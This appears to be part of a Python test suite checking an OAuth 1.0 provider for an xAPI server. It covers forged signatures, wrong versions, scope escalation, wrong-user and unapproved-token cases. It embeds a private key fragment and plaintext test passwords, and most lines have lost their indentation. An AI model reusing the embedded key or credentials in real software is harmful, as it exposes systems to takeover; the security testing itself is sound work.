AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54
Lw03eHTNQghS0A==
-----END PRIVATE KEY-----""")
self.consumer.secret = rsa_key.exportKey()
self.consumer.save()
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # Append a bogus signature instead of computing a real RSA-SHA1 one
        oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % "badsignature"
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 400)
def test_request_token_wrong_oauth_version(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in - wrong oauth_version
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.1\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 400)
def test_request_token_wrong_signature(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.1\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# create signature and add it to the header params - adding wrong signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % "wrongsignature"
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 400)
self.assertEqual(request_resp.content, 'Could not verify OAuth request.')
def test_auth_correct(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# ===================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
        request_token = Token.objects.get(consumer=self.consumer)
        self.assertIn(request_token.key, auth_post['Location'])
        self.assertEqual(request_token.is_approved, True)
def test_auth_scope_up(self):
param = {
'scope':'statements/read',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# =================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
# Increase power of scope here - not allowed
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
data['scopes'] = ['all']
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 401)
self.assertEqual(auth_post.content, 'Action not allowed.')
def test_auth_wrong_auth(self):
param = {
'scope':'statements/read',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# =================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
# Login with wrong user the client is associated with
self.client.login(username='dick', password='lassie')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
        self.assertEqual(auth_resp.status_code, 403) # Forbidden - not the user this client belongs to
self.assertEqual(auth_resp.content, 'Invalid user for this client.')
def test_auth_no_scope_chosen(self):
param = {
'scope':'statements/read',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# =================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
# User must select at least one scope
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
data['scopes'] = []
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 401)
self.assertEqual(auth_post.content, 'Action not allowed.')
def test_access_token_invalid_token(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# ==================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
        request_token_after_auth = Token.objects.get(consumer=self.consumer)
        self.assertIn(request_token_after_auth.key, auth_post['Location'])
        self.assertEqual(request_token_after_auth.is_approved, True)
        # Flip the token back to unapproved so the access token request must fail
        request_token_after_auth.is_approved = False
        request_token_after_auth.save()
# Test ACCESS TOKEN
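        # A PLAINTEXT signature is simply '<consumer_secret>&<token_secret>'
        # (RFC 5849 section 3.4.4), which is why it can be written inline here
        # instead of going through oauth2's signer.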
oauth_header_access_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_signature=\"%s&%s\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"accessnonce\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (self.consumer.key,token.key,self.consumer.secret,token.secret,str(int(time.time())),token.verifier)
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_params)
self.assertEqual(access_resp.status_code, 401)
self.assertEqual(access_resp.content, "Request Token not approved by the user.")
def test_access_token_access_resources(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"12345678\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# =========================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
request_token = Token.objects.get(consumer=self.consumer)
self.assertIn(request_token.key, auth_post['Location'])
self.assertEqual(request_token.is_approved, True)
# ===========================================================
# Test ACCESS TOKEN
oauth_header_access_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_signature=\"%s&%s\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"87654321\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (self.consumer.key,token.key,self.consumer.secret,request_token.secret,str(int(time.time())),request_token.verifier)
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_params)
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=access_token_secret, key=access_token_key)
# ==============================================================
# Test ACCESS RESOURCE
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"accessresourcenonce\","\
"oauth_version=\"1.0\"" % (self.consumer.key, access_token.key, str(int(time.time())))
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # from_request ignores realm; remove it so it is not passed to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
path = TEST_SERVER + "/XAPI/statements"
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
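    # Signing a protected-resource call also repeats across tests. A minimal
    # sketch of a helper (hypothetical, not used by this suite) built on the
    # same oauth2 calls as the tests above:
    def _signed_resource_header(self, access_token, path, nonce="resource_nonce"):
        header = "OAuth realm=\"test\","\
            "oauth_consumer_key=\"%s\","\
            "oauth_token=\"%s\","\
            "oauth_signature_method=\"HMAC-SHA1\","\
            "oauth_timestamp=\"%s\","\
            "oauth_nonce=\"%s\","\
            "oauth_version=\"1.0\"" % (self.consumer.key, access_token.key,
                str(int(time.time())), nonce)
        # Parse the header string into the dict from_token_and_callback expects
        params = {}
        for part in header.split(","):
            key, _, value = part.partition("=")
            params[key.strip()] = value.strip('"')
        del params['OAuth realm']
        req = oauth.Request.from_token_and_callback(access_token, http_method='GET',
            http_url=path, parameters=params)
        signature = oauth.SignatureMethod_HMAC_SHA1().sign(req, self.consumer, access_token)
        return header + ',oauth_signature="%s"' % signature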
def test_unicode(self):
# All client requests have the auth as unicode
# ============= INITIATE =============
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"12345678\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=unicode(oauth_header_request_token_params))
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
request_token = Token.objects.get(consumer=self.consumer)
self.assertIn(request_token.key, auth_post['Location'])
self.assertEqual(request_token.is_approved, True)
# ============= END AUTHORIZE =============
# ============= ACCESS TOKEN =============
oauth_header_access_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"87654321\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (self.consumer.key,token.key,str(int(time.time())),request_token.verifier)
# from_token_and_callback takes a dictionary
param_list = oauth_header_access_params.split(",")
oauth_header_access_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # from_request ignores realm; remove it so it is not passed to from_token_and_callback
del oauth_header_access_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(request_token, http_method='GET',
http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, request_token)
oauth_header_access_params += ',oauth_signature="%s"' % signature
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=unicode(oauth_header_access_params))
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=access_token_secret, key=access_token_key)
# ============= END ACCESS TOKEN =============
# ============= ACCESS RESOURCE =============
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"accessresourcenonce\","\
"oauth_version=\"1.0\"" % (self.consumer.key, access_token.key, str(int(time.time())))
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
path = TEST_SERVER + "/XAPI/statements"
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=unicode(oauth_header_resource_params), X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
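# The parse-and-strip loop above is repeated verbatim in nearly every test
# below. A minimal sketch of a helper that could consolidate it (illustrative
# only -- this method is not part of the original test class; it assumes the
# header string is built from comma-separated key="value" pairs exactly as in
# these tests):
def _oauth_params_to_dict(self, header_params):
    # Split 'k1="v1",k2="v2",...' into a dict and drop the realm entry,
    # since from_token_and_callback does not accept it.
    params = {}
    for pair in header_params.split(","):
        key, _, value = pair.partition("=")
        params[key.strip()] = value.strip().strip('"')
    params.pop('OAuth realm', None)
    return params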
def test_oauth_disabled(self):
# Disable oauth
if settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = False
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"act:test_put"}})
param = {"statementId":put_guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
# build signature and add to the params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
